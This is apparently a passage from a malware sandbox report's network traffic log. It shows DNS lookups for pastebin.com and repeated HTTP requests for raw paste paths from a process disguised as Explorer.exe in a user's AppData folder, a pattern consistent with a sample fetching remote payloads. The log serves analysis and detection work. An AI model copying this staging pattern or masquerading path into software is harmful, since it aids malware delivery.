                                                            Dec 9, 2024 14:13:56.100310087 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.131269932 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.322247028 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.324311972 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.324351072 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774590015 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774687052 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774772882 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.775263071 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.787266970 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.787636042 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.788124084 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.907367945 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:02.907413960 CET8049985172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:02.907433033 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.907481909 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.386061907 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.387552023 CET50046443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.387594938 CET44350046172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.387650013 CET50046443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.388247967 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.389034033 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509097099 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.509164095 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509226084 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.509293079 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509484053 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.630194902 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.617626905 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.618943930 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.618947983 CET50048443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.618993998 CET44350048172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.619354963 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:22.619381905 CET44350048104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:22.619429111 CET50048443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.619524002 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:22.738657951 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.738778114 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:23.629765987 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:23.629848957 CET44350048104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:23.629957914 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:23.630141973 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:28.646928072 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.766474962 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:28.766709089 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.766935110 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.886292934 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.864563942 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.865833044 CET50050443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.865869045 CET44350050172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.865921974 CET50050443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.866322041 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.866986036 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986020088 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.986088991 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986196041 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.986253023 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986428022 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:30.105758905 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.081731081 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.083360910 CET50052443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:31.083404064 CET44350052172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.083465099 CET50052443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:31.211859941 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.405633926 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.408586979 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.525526047 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:36.525649071 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.528170109 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:36.528470039 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.528752089 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.647977114 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:37.636913061 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:37.637427092 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:37.756849051 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:38.119513035 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:38.178560972 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.140171051 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.141222954 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.260829926 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:43.260901928 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.261383057 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:43.261450052 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.261617899 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.380855083 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.360963106 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.362515926 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.481884956 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.684132099 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.685547113 CET50055443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.685605049 CET44350055172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.685791969 CET50055443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.785852909 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.692507982 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.693284988 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812294960 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:49.812390089 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812571049 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:49.812642097 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812793016 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.932132959 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:50.940239906 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:50.940969944 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:51.060214996 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:51.260962009 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:51.334402084 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.271415949 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.271424055 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.390942097 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:56.391160965 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.391242981 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.391253948 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:56.392513037 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.512054920 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.489962101 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.491194963 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491241932 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.491302967 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491842031 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491851091 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.492746115 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.495171070 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.535336018 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.614613056 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.819231987 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.820337057 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820377111 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.820437908 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820727110 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820741892 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.821271896 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.863338947 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.863773108 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:58.716339111 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:58.716445923 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:58.716445923 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035445929 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:59.035567999 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035567999 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035573006 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:59.035733938 CET50059443192.168.2.5172.67.19.24
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 9, 2024 14:12:09.096935987 CET  59033  53  192.168.2.5  1.1.1.1
Dec 9, 2024 14:12:09.235047102 CET  53  59033  1.1.1.1  192.168.2.5
Dec 9, 2024 14:14:32.851089954 CET  53165  53  192.168.2.5  1.1.1.1
Dec 9, 2024 14:14:32.990483046 CET  53  53165  1.1.1.1  192.168.2.5
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Dec 9, 2024 14:12:09.096935987 CET  192.168.2.5  1.1.1.1  0xe431  Standard query (0)  pastebin.com  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:14:32.851089954 CET  192.168.2.5  1.1.1.1  0xc5a  Standard query (0)  pastebin.com  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 9, 2024 14:12:09.235047102 CET  1.1.1.1  192.168.2.5  0xe431  No error (0)  pastebin.com  -  172.67.19.24  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:12:09.235047102 CET  1.1.1.1  192.168.2.5  0xe431  No error (0)  pastebin.com  -  104.20.4.235  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:12:09.235047102 CET  1.1.1.1  192.168.2.5  0xe431  No error (0)  pastebin.com  -  104.20.3.235  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:14:32.990483046 CET  1.1.1.1  192.168.2.5  0xc5a  No error (0)  pastebin.com  -  172.67.19.24  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:14:32.990483046 CET  1.1.1.1  192.168.2.5  0xc5a  No error (0)  pastebin.com  -  104.20.4.235  A (IP address)  IN (0x0001)  false
Dec 9, 2024 14:14:32.990483046 CET  1.1.1.1  192.168.2.5  0xc5a  No error (0)  pastebin.com  -  104.20.3.235  A (IP address)  IN (0x0001)  false
• pastebin.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  49704  172.67.19.24  80  7356  C:\Users\user\AppData\Roaming\Explorer.exe
Timestamp  Bytes transferred  Direction  Data
Dec 9, 2024 14:12:09.370579958 CET  74  OUT  GET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Dec 9, 2024 14:12:10.460917950 CET  472  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 13:12:10 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 09 Dec 2024 14:12:10 GMT
Location: https://pastebin.com/raw/hbwHfEg3
Server: cloudflare
CF-RAY: 8ef53ec85f2d7c8d-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.5  49760  172.67.19.24  80  7356  C:\Users\user\AppData\Roaming\Explorer.exe
Timestamp  Bytes transferred  Direction  Data
Dec 9, 2024 14:12:39.626308918 CET  50  OUT  GET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:12:40.733129025 CET  472  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 13:12:40 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 09 Dec 2024 14:12:40 GMT
Location: https://pastebin.com/raw/hbwHfEg3
Server: cloudflare
CF-RAY: 8ef53f857a254325-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.5  49765  172.67.19.24  80  7356  C:\Users\user\AppData\Roaming\Explorer.exe
Timestamp  Bytes transferred  Direction  Data
Dec 9, 2024 14:12:40.860016108 CET  74  OUT  GET /raw/KKpnJShN HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Dec 9, 2024 14:12:41.956856966 CET  472  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 13:12:41 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 09 Dec 2024 14:12:41 GMT
Location: https://pastebin.com/raw/KKpnJShN
Server: cloudflare
CF-RAY: 8ef53f8d2b974325-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.5  49787  172.67.19.24  80  7356  C:\Users\user\AppData\Roaming\Explorer.exe
Timestamp  Bytes transferred  Direction  Data
Dec 9, 2024 14:12:48.940943956 CET  74  OUT  GET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Dec 9, 2024 14:12:50.116533995 CET  472  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 13:12:49 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 09 Dec 2024 14:12:49 GMT
Location: https://pastebin.com/raw/hbwHfEg3
Server: cloudflare
CF-RAY: 8ef53fbfea18433e-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.5  49790  172.67.19.24  80  7356  C:\Users\user\AppData\Roaming\Explorer.exe
Timestamp  Bytes transferred  Direction  Data
Dec 9, 2024 14:12:50.240664959 CET  74  OUT  GET /raw/KKpnJShN HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Dec 9, 2024 14:12:51.354226112 CET  472  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 13:12:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 09 Dec 2024 14:12:51 GMT
Location: https://pastebin.com/raw/KKpnJShN
Server: cloudflare
CF-RAY: 8ef53fc7c90843ed-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            5           192.168.2.5  49812        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:12:58.160624981 CET  74                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:59.290079117 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:59 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53ff97cc341d2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            6           192.168.2.5  49815        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:12:59.410897970 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:00.523938894 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:00 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54001281572b1-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            7           192.168.2.5  49836        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:07.350838900 CET  50                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:08.560107946 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:08 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540336aee41a9-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            8           192.168.2.5  49840        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:08.682054043 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:09.794367075 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:09 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5403b2b897d16-EWR
